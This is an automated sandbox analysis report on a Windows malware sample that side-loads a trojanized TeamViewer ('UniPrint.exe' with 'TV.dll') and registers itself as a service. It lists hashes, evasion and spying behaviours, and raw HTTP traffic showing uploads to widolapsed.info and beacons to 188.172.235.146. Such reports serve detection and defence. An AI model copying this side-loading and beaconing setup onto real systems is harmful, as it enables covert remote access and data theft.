
Windows Analysis Report wogZe27GBB.exe

Overview

General Information

Sample Name: wogZe27GBB.exe
Analysis ID: 483790
MD5: 5efc68abd7fec415e34980d95a06a66a
SHA1: 34b243a0b3e322b8983b528caa5849395360a91d
SHA256: 0f655a8ac0d7fdc7ac44fdd9799129848faf9c73bfa0e108fd903de439447232
Tags: exeMappingOOOsigned

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 17
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (window names)
Creates processes via WMI
DLL side loading technique detected
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Contains functionality to execute programs as a different user
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
EXE planting / hijacking vulnerabilities found
PE file does not import any functions
DLL planting / hijacking vulnerabilities found
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates or modifies windows services
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Contains functionality to delete services
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)
Contains functionality to read data from the clipboard

Process Tree

  • System is w10x64
  • wogZe27GBB.exe (PID: 7160 cmdline: 'C:\Users\user\Desktop\wogZe27GBB.exe' MD5: 5EFC68ABD7FEC415E34980D95A06A66A)
    • UniPrint.exe (PID: 4260 cmdline: 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • UniPrint.exe (PID: 5356 cmdline: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 4296 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5904 cmdline: c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'uniprint.exe' -s USBManager MD5: FA6C268A5B5BDA067A901764D203D433)
  • svchost.exe (PID: 6852 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • UniPrint.exe (PID: 6952 cmdline: 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • UniPrint.exe (PID: 7016 cmdline: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • UniPrint.exe (PID: 7080 cmdline: 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 6408 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • UniPrint.exe (PID: 6484 cmdline: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 5248 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: wogZe27GBB.exe | Virustotal: Detection: 53%
Source: wogZe27GBB.exe | ReversingLabs: Detection: 62%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll | ReversingLabs: Detection: 51%
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.wogZe27GBB.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen2
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 5_2_0049B32E __EH_prolog3,CryptGenRandom,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 5_2_0049B4A0 __EH_prolog3_catch,CryptAcquireContextA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 5_2_006F605B CryptReleaseContext,

Compliance:

Uses 32bit PE files
Source: wogZe27GBB.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
EXE planting / hijacking vulnerabilities found
Source: C:\Users\user\Desktop\wogZe27GBB.exe | EXE: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
DLL planting / hijacking vulnerabilities found
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | DLL: WINSTA.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | DLL: SAMCLI.DLL
Source: C:\Users\user\Desktop\wogZe27GBB.exe | DLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | DLL: WINMM.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | DLL: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | DLL: Secur32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | DLL: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | DLL: SHFolder.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe | DLL: VERSION.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe | DLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | DLL: version.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | DLL: userenv.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | DLL: WININET.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | DLL: Cabinet.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | DLL: MSVFW32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | DLL: CRYPTSP.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | DLL: AVICAP32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | DLL: WSOCK32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | DLL: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | DLL: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | DLL: MPR.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe | DLL: edputil.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | DLL: iertutil.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe | DLL: urlmon.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe | DLL: SHFOLDER.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | DLL: WINMMBASE.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | DLL: NETUTILS.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | DLL: SRVCLI.DLL
Source: C:\Users\user\Desktop\wogZe27GBB.exe | DLL: CLDAPI.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | DLL: SensApi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | DLL: msimg32.dll
Uses secure TLS version for HTTPS connections
Source: unknown | HTTPS traffic detected: 45.153.241.148:443 -> 192.168.2.4:49767 version: TLS 1.2
PE / OLE file has a valid certificate
Source: wogZe27GBB.exe | Static PE information: certificate valid
Binary contains paths to debug symbols
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000000.684861880.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000000.698733412.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.756410027.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.759885262.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000000.758970133.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.778184105.0000000000733000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000000.684861880.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000000.698733412.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.756410027.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.759885262.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000000.758970133.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.778184105.0000000000733000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000002.707742521.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000002.1076091636.000000006E5CC000.00000002.00020000.sdmp, svchost.exe, 00000007.00000002.1072106592.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759626756.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.762333599.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000002.776275044.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.780622367.000000006E5CC000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb< source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, nsrC1CA.tmp.0.dr
Source: C:\Users\user\Desktop\wogZe27GBB.exe | Code function: 0_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\wogZe27GBB.exe | Code function: 0_2_0040263E FindFirstFileA,
Source: C:\Users\user\Desktop\wogZe27GBB.exe | Code function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 3_2_6E5C2EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 3_2_6E5C2960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 5_2_6E5C2EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 5_2_6E5C2960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,
Uses a known web browser user agent for HTTP communication
Source: global traffic | HTTP traffic detected: POST /B8C631A8/ HTTP/1.1 Content-Length: 85991 Content-Type: multipart/form-data; boundary=--------988836371 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: widolapsed.info Connection: Close Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /B8C631A8/ HTTP/1.1 Content-Length: 86008 Content-Type: multipart/form-data; boundary=--------2871961252 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: widolapsed.info Connection: Close Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /B8C631A8/ HTTP/1.1 Content-Length: 85958 Content-Type: multipart/form-data; boundary=--------2035396243 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: widolapsed.info Connection: Close Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master13.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=42047145&p=10000001&client=DynGate&data=FyQSbQCjHqkys5MkoZ6YmBgcGRsZGpmckySiHpgTJqChnpg8MrGzGjExHByxGZkbr5kcmpsaHBgbGRsTJqSiHpg8MrGzGjExHByxGZkbr5kcmpsaHBgbGRsTJ6meq7S3GZcYmJMrHpialxgXGxwbkCip HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=42047145&client=DynGate&p=10000002 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master13.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master13.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=42047152&p=10000001&client=DynGate&data=FyQS8QAjHqmyuig6sTY0saWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAH7LQs0qhaWs0MJjaOW1RZp/s+y/yn5XEbeVZg9sKBJ5zPw4VSW4zdwQ3dPOJPU35FNkIfcILZEzewXzbzR9HNSPt0dvZIMvjxebsFa8mt4yIfhUHNJCrU/eCKZvCgbkPO7XECRgFWPWpqy/DxavH2VA1uMNeC6MgWi1tqYJlUpU HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=42047152&client=DynGate&p=10000002 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master13.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master13.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s7cwujq5MqWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pU HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=42047159&client=DynGate&p=10000002 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master13.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master13.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=42047224&p=10000001&client=DynGate&data=FyQS6wChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMlsrK4MLY0uzKemJMmMLczurCzsp61MJMmNLGytzmyqjy4Mp6YEyakoh6YPDKxsxoxMRwcsRmZG6+ZHJqbGhwYGxkbEyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpqTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=42047224&client=DynGate&p=10000002 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master13.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=10000001 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: 188.172.235.146 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /dout.aspx?s=12251267&p=10000001&client=DynGate HTTP/1.1 Accept: */* Content-Type: application/octet-stream Content-Transfer-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: 188.172.235.146 Content-Length: 3 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /dout.aspx?s=12251267&p=10000002&client=DynGate HTTP/1.1 Accept: */* Content-Type: application/octet-stream Content-Transfer-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: 188.172.235.146 Content-Length: 500000 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=12251267&m=fast&client=DynGate&p=10000002 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: 188.172.235.146 Connection: Keep-Alive Cache-Control: no-cache
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown | Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown | TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: svchost.exe, 00000010.00000003.796660082.00000217C6F8B000.00000004.00000001.sdmpString found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: UniPrint.exe, 00000005.00000003.716845833.00000000057DB000.00000004.00000001.sdmp | String found in binary or memory: http://188.172.235.146/
Source: UniPrint.exe, 00000005.00000003.716845833.00000000057DB000.00000004.00000001.sdmp | String found in binary or memory: http://188.172.235.146/EM
Source: UniPrint.exe, 00000005.00000002.1075966656.0000000005820000.00000004.00000001.sdmp | String found in binary or memory: http://188.172.235.146/din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=10000001
Source: UniPrint.exe, 00000005.00000003.715254848.0000000005801000.00000004.00000001.sdmp | String found in binary or memory: http://188.172.235.146/din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=100000012
Source: UniPrint.exe, 00000005.00000002.1075966656.0000000005820000.00000004.00000001.sdmp | String found in binary or memory: http://188.172.235.146/din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=10000001K
Source: UniPrint.exe, 00000005.00000002.1075067789.0000000003B1C000.00000004.00000001.sdmp | String found in binary or memory: http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=1000
Source: UniPrint.exe, 00000005.00000002.1075966656.0000000005820000.00000004.00000001.sdmp | String found in binary or memory: http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=10000002
Source: UniPrint.exe, 00000005.00000003.1014947497.00000000057B2000.00000004.00000001.sdmp | String found in binary or memory: http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=10000002.
Source: UniPrint.exe, 00000005.00000003.715254848.0000000005801000.00000004.00000001.sdmp | String found in binary or memory: http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=100000023321935-2125563209-405306
Source: UniPrint.exe, 00000005.00000003.714775003.00000000057B2000.00000004.00000001.sdmp | String found in binary or memory: http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=10000002Z
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp | String found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000001&client=DynGate
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp | String found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000001&client=DynGatepzm
Source: UniPrint.exe, 00000005.00000002.1075067789.0000000003B1C000.00000004.00000001.sdmp | String found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp | String found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client=DynGate
Source: UniPrint.exe, 00000005.00000002.1072952284.0000000000AE8000.00000004.00000020.sdmp | String found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client=DynGate:%
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp | String found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client=DynGateZ
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp | String found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client=DynGatellow
Source: wogZe27GBB.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: wogZe27GBB.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: svchost.exe, 00000010.00000002.817773606.00000217C6F00000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wogZe27GBB.exe | String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: svchost.exe, 00000010.00000002.817452731.00000217C68E9000.00000004.00000001.sdmp | String found in binary or memory: http://crl.ver)
Source: UniPrint.exe, 0000000A.00000002.757533910.0000000000B88000.00000004.00000020.sdmp | String found in binary or memory: http://crl.verisign.co
Source: UniPrint.exe, 0000000A.00000002.757533910.0000000000B88000.00000004.00000020.sdmp | String found in binary or memory: http://crl.verisign.corl0
Source: wogZe27GBB.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: wogZe27GBB.exe | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: wogZe27GBB.exe | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: wogZe27GBB.exe | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: wogZe27GBB.exe | String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
